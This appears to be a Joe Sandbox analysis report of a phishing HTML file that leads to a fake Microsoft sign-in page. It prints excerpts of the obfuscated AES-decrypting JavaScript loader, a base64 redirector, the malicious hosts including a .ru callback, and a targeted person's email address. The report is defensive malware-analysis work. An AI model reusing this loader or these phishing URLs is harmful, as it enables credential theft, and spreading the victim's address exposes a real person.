Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htm

Overview

General Information

Sample name:httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htm
Analysis ID:1500044
MD5:fe8307e887e92d0b7aabd93707653e50
SHA1:50792cccfedaa24022253702449a2caaa11b9730
SHA256:1b26523c332b21f3e6a8f703b4004a90938e2a7178346ac19a2ec5e763a2af16
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish10
Yara detected HtmlPhish70
Yara detected Phisher
Detected javascript redirector / loader
HTML Script injector detected
HTML page contains hidden URLs
HTML page contains hidden email address
HTML page contains suspicious javascript code
Phishing site detected (based on logo match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 3752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2108,i,18282856199490387947,11030613626168180458,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_110JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_102JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
      dropped/chromecache_108JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
        dropped/chromecache_101JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
          dropped/chromecache_104JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            4.2.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
              4.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
                4.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
                  No Sigma rule has matched
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  Phishing

                  barindex
                  Source: Yara matchFile source: 4.3.pages.csv, type: HTML
                  Source: Yara matchFile source: 4.4.pages.csv, type: HTML
                  Source: Yara matchFile source: 4.2.pages.csv, type: HTML
                  Source: Yara matchFile source: dropped/chromecache_102, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_108, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_101, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_104, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_95, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_110, type: DROPPED
                  Source: httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htmHTTP Parser: Low number of body elements: 1
                  Source: file:///C:/Users/user/Desktop/httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htmHTTP Parser: New script tag found
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: https://glansaolksnu.ru///7627.php
                  Source: https://www.estampariaimagemeacao.com.br/js/images/tvavx.phpHTTP Parser: caroline.vianna@globalfoundries.com
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: window.location.href = atob(
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=Matcher: Template: microsoft matched
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=Matcher: Template: microsoft matched
                  Source: https://www.estampariaimagemeacao.com.br/js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauberHTTP Parser: var emphasis= document.createelement("script");emphasis.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(emphasis);emphasis.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoinjuzntbxu21tztzzdgjnuvg5mmt3nwxlnlhhyzjhakhumkc0tmhobezoctnyehfts3a3u0fmeuzcb0zuaunxmg9rdlhzadvwnjjmk0lxrnbwnljxceriy091uxbxowhgz29ldxltdkhpcwjlz3rque9xcu03ovdmdlwvawnfrlrqavvcr0honetmru9qv2npvzdvb0zkuhpcl25ycnh4snlty2hluhrtsxfmmxjzvmxyszhcazfmyxparm1lagnmnfhrvunveda2c2z6v0xscm5ir2vfsm9lu2nqastrzhrrymrpr3zrmlj5nu5hctjisffrshvuogk0unlsqwi0envothvjr0vtmgjhcnv2rfldz0tzc2vadk41qjhjadlszg1zu1puv3pia2l4tlzpdwhin3nzbkriukzclzvtogiwdhjnohqzqvbdcklpudl6z0szovhhs1fdujjtngdham9feu9qre90ednnb1jib1qregxhdnrcekezdmvtbw5tsevpbuf1zffna3f5rgjrs1hpethgmnvbuwhubk95ntd6xc9wsmzknm5cchf1t2v5oufqwg5nwxm0shhlckqwaxrmagvytwveqjderhfnufbja2pvuxzynnlhm0towvvfqu1hqxdfne0roxruwk1xz0c2etvxovrsefdytgrsa3rpuklxnkjcegz1mmhqutjqzjjwqxbcl2rmdgtvvdvhcjyxytzssnvlderyuupmmtq1exvcryt1mzrusgr2ogo...
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: async function labored(yachting) { <!-- driving is the rhythm of life in motion. --> var {a,b,c,d} = json.parse(yachting); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function iconoclast() {iced.hidden = 0;yearn.hidden = 1; document.write(await labored(await (await fetch(await labored(atob(`eyjhijoicvrtu0lxeuhmwxc4ajrsyxpwofztq0z1u05ltctcl24ywlfude1pvzbivdg9iiwiyyi6ijk2zjk4yzg0mmfmotjjntjkndfjogq2yjuxzdq1otc2iiwiyii6ijc2yzninmnkodgzzmmymda0oti1mwrinwixmmviywm5njcxogjiowiynta5mddlymmxm2i2mza5nwm0nduxymi4mjrinwq2ndyyytrjmjnizjayytnmnti5ntniytbmndm2ndzmzjqwmje0ymi4ytawzwe2nta3nzflyzyzmziyywnmndm5mtlkzjrmndq2zmzhndzmotg2zwnkmwrjztdjowu4odrhyji3zmmznzu3ytgyyzfmodjhoguzzdizy2myzjviowm2zjjhmzu5mzbkzgezodk5zmywzdi0ndgzztc4mzm2ztc2mzgwmzcymjq4n2jlyzrhzjjmnjdkymrlyzy1yme3owezytdhyjljmzlkm...
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: Number of links: 0
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: Total embedded image size: 45708
                  Source: httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htmHTTP Parser: Base64 decoded: caroline.vianna@globalfoundries.com
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: Title: Sign in to your account does not match URL
                  Source: httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htmHTTP Parser: No favicon
                  Source: file:///C:/Users/user/Desktop/httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htmHTTP Parser: No favicon
                  Source: https://www.estampariaimagemeacao.com.br/js/images/tvavx.phpHTTP Parser: No favicon
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: No favicon
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: No favicon
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: No favicon
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: No <meta name="author".. found
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: No <meta name="author".. found
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: No <meta name="copyright".. found
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: No <meta name="copyright".. found
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49748 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49760 version: TLS 1.2
                  Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
                  Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
                  Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
                  Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49748 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
                  Source: global trafficHTTP traffic detected: GET /js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber HTTP/1.1Host: www.estampariaimagemeacao.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber HTTP/1.1Host: www.estampariaimagemeacao.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.estampariaimagemeacao.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.estampariaimagemeacao.com.br/js/images/tvavx.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.estampariaimagemeacao.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FnM5CyNXVMxGvGD&MD=7xYbZndX HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: glansaolksnu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /, HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /, HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET ///7627.php HTTP/1.1Host: glansaolksnu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET ///7627.php HTTP/1.1Host: glansaolksnu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET ///7627.php HTTP/1.1Host: glansaolksnu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FnM5CyNXVMxGvGD&MD=7xYbZndX HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficDNS traffic detected: DNS query: www.estampariaimagemeacao.com.br
